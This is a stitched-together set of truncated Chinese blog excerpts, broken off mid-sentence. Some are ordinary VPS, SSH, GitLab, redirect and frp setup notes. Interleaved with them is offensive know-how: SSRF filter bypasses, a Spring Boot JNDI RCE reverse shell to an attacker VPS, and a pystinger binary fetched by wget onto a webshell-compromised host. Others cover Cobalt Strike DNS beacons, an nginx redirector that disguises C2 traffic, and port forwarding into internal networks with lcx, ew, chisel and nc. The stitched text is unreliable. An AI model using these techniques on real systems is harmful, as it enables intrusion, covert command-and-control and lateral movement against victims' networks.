oracle的免费vps默认是使用私钥登录的。今天我们就设置一下,以后用ssh密码登录。...如果直接ssh是这样的 登录oracle cloud,找到对应的实例点击进去 点击控制台连接,启用cloud shell连接 等加载好后,我们输入root,和自己的root密码,进入成功...继续下滑,把Yes的给放开注释,把No的给加上注释,如下图 然后重新启动SSH服务 systemctl restart sshd 然后终端再次尝试连接,发现就可以输入密码了 此时输入密码,就可以登录成功了
问题背景 通过 gitlab 容器创建了一个项目,想 clone 到本地,结果发现项目的 IP 地址是一串数字 ? 问题排查 明明创建项目的时候,IP 地址还是正常的鸭! ?...解决方案 先说下我创建 gitlab 容器的语句 是进行了目录映射的 docker run -d -p 443:443 -p 9001:80 -p 8022:22 \ --name gitlab \ -...将这个 external_url 改成主机的 IP,不需要加端口哦 保存! 重启 gitlab 容器 docker restart gitlab 修改成功 ?...注意事项一 如果重启 gitlab 容器,访问网页的时候报 502,可以参考这篇文章解决 https://www.cnblogs.com/poloyy/p/13883500.html 注意事项二 如果没有映射目录
,就存在Bypass的不同方式 0x01 常见的过滤 过滤开头不是http://xxx.com的所有链接 过滤格式为ip的链接,比如127.0.0.1 结尾必须是某个后缀 0x02 绕过 http://...需要一个vps,把302转换的代码部署到vps上,然后去访问,就可跳转到内网中 补充vps: VPS是Virtual Private Server的缩写,即虚拟私人服务器。...**安全性**:VPS之间是隔离的,因此安全性较高,一般不会因为其他VPS的问题而受到影响。 对于你的需求,部署302重定向代码到VPS上可以通过以下步骤完成: 1....> DNS解析 配置域名的DNS解析到目标地址(A、cname等),这里有几个配置解析到任意的地址的域名: nslookup 127.0.0.1.nip.io nslookup owasp.org.127.0.0.1...它会把如下的域名解析到特定的地址,其实和dns解析绕过一个道理。
拨号VPS(通常为ADSL拨号VPS)的特点是:每次重新拨号,运营商都会为其分配一个新的公网IP地址。...通过自动化控制多台这样的VPS进行拨号换IP,并将它们组织成一个代理池,我们的爬虫就可以通过这个池子随机获取新鲜的、来自真实家庭宽带的有效IP地址,极大地降低被目标网站封禁的风险。...搜索关键词如 dial-up vps, dynamic ip vps。选择地域:根据你的目标网站,选择不同地区的VPS,以获得更多样化的IP段。选择数量:起步可以先购买3-5台。...第二步:搭建代理服务(在每个节点上)你需要在每台VPS上安装一个轻量级的代理服务器,让爬虫可以通过它访问网络。推荐选择:TinyProxy。它非常轻量,配置简单,非常适合这个场景。...默认是 Allow 127.0.0.1,为了安全,你应该将其改为你的中央调度服务器的IP地址(或者你本地开发机器的IP),这样只有你的服务器能使用这个代理。
网络上对于域名 301 重定向的说法各种各样,大部分都是复制粘贴来的,没有经过测试也没有考虑到新手小白的理解能力,鉴于此老魏经过亲自测试使用后,总结此文给有这方面困扰的朋友解惑。...二是主域名和 www 域名如果不做 301 重定向,百度会分别收录并把权重分散到 2 个不同的域名上(百度认为主域名和 www 域名是 2 个不同的域名),在百度搜索你网站的关键词,会找到主域名和 www...那么首先找找看你域名商的解析里面有没有提供 301 重定向的功能,不懂就发工单问问客服。如果有的话可以试着解析后查询主域名的 https 状态码,就知道是不是真正的 301 重定向了。...首先你得把主域名和 www 域名都添加 A 记录解析到 VPS 的 IP 地址上,然后根据本文第一段里面 lnmp 设置 301 重定向的文章操作。...对于第二种方法下使用 lnmp 环境的 VPS 服务器,在 VPS 上面设置完 301 重定向之后,输入命令 curl -I vpsss.net 查询域名 https 状态,如果是上图的状体就说明 301
0x02:配置不当而暴露的路由 主要是因为程序员开发时没有意识到暴露路由可能会造成安全风险,或者没有按照标准流程开发,忘记上线时需要修改/切换生产环境的配置 参考 production-ready-endpoints...; your-vps-ip 换成自己外网服务器的真实 ip 地址。...使用 python 在自己控制的服务器上运行以上的脚本,并根据实际情况修改脚本中反弹 shell 的 ip 地址和 端口号。.../your-vps-ip!...payload 根据实际情况修改 springboot-realm-jndi-rce.py 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。
鉴于网络上各种 VPS 和不同的 php 环境包,情况千差万别,有的朋友按照那篇文章的方法就没有成功。...看到网上太多人问 linux 环境下如何做域名 301 重定向,而很多回答都是复制粘贴来的,没有经过严格测试,所以你照着做也不会成功。老魏的教程是自己一步步操作过来的,完全是真实情况的记录。...国内通常说的域名 301 重定向,一般是指的主域名(也就是不带 www 的域名)做 301 重定向到 www 域名上面,这也符合国人的浏览习惯。...再添加一条记录,主机记录“www”,记录类型“A 记录”,记录值“你 VPS 的 IP 地址”,保存。 ?...DNSPOD 从技术上用“显性 URL”实现了 301 重定向功能,不需要再去 VPS 服务器上面做设置了,省去了很多操作。
内网机器:192.168.1.2 外网vps地址;122.114.250.153 内网机器192.168.1.2执行: ssh -fCNR 7280:127.0.0.1:8882 root@122.114.250.153...注意ssh只能够将内网的端口转发到外网,不能够动态的自动内网代理.如果你需要通过互联网代理直接穿透到内网,一般来说有两个方法: 如果你可以在内网的机器上创建一个透明代理端口且可以内网机器使用ssh: 在内网机器可以建立一个透明代理...就可以直接输入地址访问内网中的资源了 注意ssh绑定地址到0.0.0.0 vps一般情况下ssh默认转发只会映射到本地的127.0.0.1的端口.如果你需要映射到0.0.0.0让外网访问.修改配置 /etc...autossh -M 4444 -NR 7280:127.0.0.1:8882 root@server1 这时候你来到外网的vps上面就可以看到,vps监听了7280端口 IP地址切换导致断网...注意,如果和外网通信的内网机器的ip地址改变,会导致整条通道断开。
(3):第三步:使用攻击者主机连接kali的SSH ssh -p 8888 root@VPS(chisel服务端IP) ?...首先,需要先明确两个概念,127.0.0.1和0.0.0.0者两个IP进行监听的区别是什么?127.0.0.1监听的是本机上的所有流量,0.0.0.0监听的是所有的IP(不论是不是本机的IP)的流量。...这就导致一个问题,如果我直接在VPS上执行完命令之后,默认监听127.0.0.1的1080端口,这样的话,我只能用VPS去访问内网主机,如果想要在win10上通过SocksCap设置代理访问内网是行不通的...,因为刚才说过,这个127.0.0.1的1080端口只能使用VPS这台主机访问内网的win7。...在VPS上使用ssh进行本地流量转发: ssh -C -f -N -g -L 0.0.0.0:23333:127.0.0.1:1080 root@VPS ?
当前是连接状态,你可以Beacon上用link ip>命令链接它或者unlink ip>命令断开它。这种Beacon在内网横向渗透中运用的很多。...tcp -p "0.0.0.0:8080" --daemon2.用netsh命令将访问内网ip 192.168.111.131的822端口(必须为未使用的端口,否则会失败)的流量重定向到外网ip 192.168.1.88...防火墙开放UDP端口53 : 82.xxx.xxx.193)cobalt strike 4.1二、域名设置1)设置解析配置A记录设置成vps的ip,cs也配置在vps上配置几个ns记录 指向刚刚A记录对应的域名配置完成之后...ping test.yokan.xxx可以ping通 vps上查看53端口占用情况,停掉vps的53端口服务 systemctl stop systemd-resolved2)cs设置监听!...所在内网的socks4a代理此时已经将目标服务器的127.0.0.1:60020映射到vps的127.0.0.1:60020cobalt strike单主机上线proxy.jsp上传到目标服务器,确保
当前是连接状态,你可以Beacon上用link ip>命令链接它或者unlink ip>命令断开它。 这种Beacon在内网横向渗透中运用的很多。...-t tcp -p "0.0.0.0:8080" --daemon 2.用netsh命令将访问内网ip 192.168.111.131的822端口(必须为未使用的端口,否则会失败)的流量重定向到外网ip...,防火墙开放UDP端口53 : 82.xxx.xxx.19 3)cobalt strike 4.1 二、域名设置 1)设置解析 配置A记录设置成vps的ip,cs也配置在vps上 配置几个ns记录...指向刚刚A记录对应的域名 配置完成之后ping test.yokan.xxx可以ping通 vps上查看53端口占用情况,停掉vps的53端口服务 systemctl stop systemd-resolved...example.com所在内网的socks4a代理 此时已经将目标服务器的127.0.0.1:60020映射到vps的127.0.0.1:60020 cobalt strike单主机上线 proxy.jsp
02 拓扑结构 03 使用方法 下载地址: https://github.com/FunnyWolf/pystinger 拿下第一层网络后,上传webshell到机器上。...在自己的VPS上搭建一个server python3 -m http.server 1234 在目标服务器上使用wget来下载 wget http://自己的VPS:1234/stinger_server.../stinger_client -w http://自己的VPS:7777/proxy.php -l 127.0.0.1 -p 60000 此时目标机的60020端口已经映射到了VPS的60020端口了...在VPS上启动CS的服务端,然后设置监听,其中HTTP Hosts为目标机的ip地址,端口默认60020。...目标机网络:192.168.99.110 10.0.1.135 这里是目标机的内网IP地址 生成木马 保存等待上传到内网机 04 代理到内网机 先在目标机执行ew .
分别是win7、server2008、kali linux 因为需要从不同的角度来进行配置ip地址,所以在这里先不固定ip地址。...反向代理:由内网主机主动交出权限到代理机器,然后本地去连接形成反向代理。例如:VPS监听本地端口,已控内网服务器来连接此端口,形成一个隧道。如果内网设备连接外网,就无法回弹只能再想其他办法。 3....,首先要在VPS机上运行监听的端口(如果首先运行内网机的话,会一直显示连接错误) 在VPS上运行 ....-h 帮助信息 -i secs 延时的间隔 -l 监听模式,用于入站连接 -L 连接关闭后,仍然继续监听 -n 指定数字的IP地址,不能用hostname -o file 记录16进制的传输 -p port...先在kali上启动命令 nc -l -p 7777 < 1.txt 然后在接收文件的08上访问kali的ip地址进行接收 nc64.exe 192.168.238.15 7777 > 1.txt
rewrite地址重写及return应用的语法解析: 根据浏览器标识,访问资源重定向到指定文件目录,下面用IE浏览器示例: if ($http_user_agent ~ MSIE ) { rewrite...redirect 如果replacement不是以http:// 或https://开始,返回302临时重定向 permant 返回301永久重定向 最终完整的重定向URL包括请求scheme(http...$1/mp3/$2.ra last; return 403; ... } 如果这些rewrite放到 “/download/” location如下所示, 那么应使用break而不是...后面if语句的作用是将ssdr.info的方位重定向到www.ssdr.info,这样既解决了网站的主目录访问,又可以增加seo中对www.ssdr.info的域名权重。...$ { expires 12h; } 这样就可以实现了前端VPS可以反向代理任意域名到后端VPS,只要将域名解析到前端VPS,后端VPS进行域名绑定,那么就可以直接访问到了。
随着国外 VPS 越来越便宜,很多站长为了性价比都把网站转移到了大陆以外的地区,比如使用美国 VPS、日本 VPS、韩国 VPS、中国台湾 VPS。...首先涉及到修改域名 NS 服务器。比如你是在国内万网注册的域名。进入阿里云万网域名管理界面之后,找到你要设置的域名,点击后面的管理进入“域名控制台”。...弹出输入 DNS 服务器地址的界面。我这里已经提前修改好了,你需要输入 DNSPOD 的两个 NS 服务器地址,最后点击确认即可。...现在添加@和 www 域名的 A 记录,记录值指向你的服务器 IP 地址即可。...而国内除了腾讯云 CDN 加速之外还有百度云加速等等别的很多提供 CDN 加速功能的商家,根据个人情况自行选择,以后也会把别家 CDN 的操作写出教程来方便大家参考选择。
因为现阶段的边界设备、防火墙甚至入侵防御系统 还无法识别 IPv6 的通信数据,而大多数的操作系统支持 IPv6 ,所以需要进行人工配置。 ?...在为执行隧道功能的节点建立IP地址时,自动隧道方法无需进行配置;而配置隧道方法则要求隧道末端节点使用其他机制来获得其IPv4地址,例如采用DHCP、人工配置或其他IPv4的配置机制。...lcx.exe -slave ip> 8000 127.0.0.1 3389 ?.../portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 23 意思就是将内网受害主机22端口的流量转发到公网攻击机的23端口。 ?...这里的操作是正向shell会受到防火墙的限制而不成功,可以使用命令关闭受害机的防火墙。
说明:UDPSpeeder很早前博客就介绍过,是一个双边网络加速工具,本身是加速UDP流量,但也可以加速TCP/UDP/ICMP,而网络游戏也是走的UDP,我们可以用来配合SSTap来最大改善我们的游戏体验...udp2raw不是加速器,只是一个帮助你绕过UDP限制的工具,作用是把udp流量混淆成tcp流量,可以突破udp流量限制或Udp QOS,极大提升稳定性。...1、VPS服务器配置 先下载UDPSpeeder服务端并解压,下载地址:点击进入,使用命令: #目前最新编译好的二进制文件版本20180522.0 wget https://github.com/wangyu...TCP端口转发 只转发UDP在55R上是用不了UDP功能,这里还需要转发下TCP,在VPS上先安装BBR加速TCP。...配置SSTap 首先查看使用教程:SSTap:可以用SS来进行海外游戏加速的工具,记得55R服务器IP填127.0.0.1,端口填转的端口,比如本文的7773,其他参数一模一样。 ?
一个目标(这里那我舍友的做实验) vps : 39.168.xxx.x kali: 192.168.221.128 frp内网穿透 首先现在frp到vps和kali https://github.com.../fatedier/frp/releases vps上启动frps 服务端 kali上启动frpc 客户端 vps启动frps vim frps.ini bind_port = 7000//.../frps.ini kali启动frpc vim frpc.ini 39.xx那个是vps的地址 7000是frpc的工作端口必须和上面frps保持一致 后面是服务器用6000端口转发到本机的5555..._ip:9000 user@server1_ip 这样访问80端口就是访问了server2的9000端口了。...当然如果本地端口转发到server1的9000端口的话 直接把server2_ip换成127.0.0.1就好。
公网 IP 和客户端连接密码,后台运行避免终端关闭后进程终止:# 启动CS(第一个参数:VPS公网IP;第二个参数:客户端连接密码)cd /opt/cs....CS服务端(CS真实地址和端口,与teamserver配置一致)upstream cs_server { server 127.0.0.1:65000; keepalive 10; # 保持...禁用缓存(避免CDN/浏览器缓存C2流量) expires off; proxy_redirect off; } # 非指定路径请求,重定向到百度(伪装正常网站跳转...) location / { return 302 https://www.baidu.com; }}# HTTP服务配置(80端口重定向到HTTPS,符合正常网站行为)server...访问非指定路径(应重定向到百度)curl -k -L https://your.domain/test # -L跟随重定向5.
特地去搜索了一些关于内网穿透的东西,发现了GitHub上一个开源的内网穿透工具--- frp,经过短暂的学习之后,终于实现了能够远程ssh和vnc到树莓派。...内网穿透 内网穿透即NAT穿透,网络连接时术语,计算机是局域网内时,外网与内网的计算机节点连接通信 准备工作 具有公网IP的vps 树莓派可上外网 frp 项目地址:https://github.com...[ssh] type = tcp local_ip = 127.0.0.1 local_port = 22 remote_port = 6000 #这个端口自行设置,需要vps开启这个端口的权限...[vnc] type = tcp local_ip = 127.0.0.1 local_port = 5900 remote_port = 6001 #这个端口自行设置,需要vps开启这个端口的权限 #...的ip地址 连接vnc:用vnc客户端连接 vps的ip地址:6001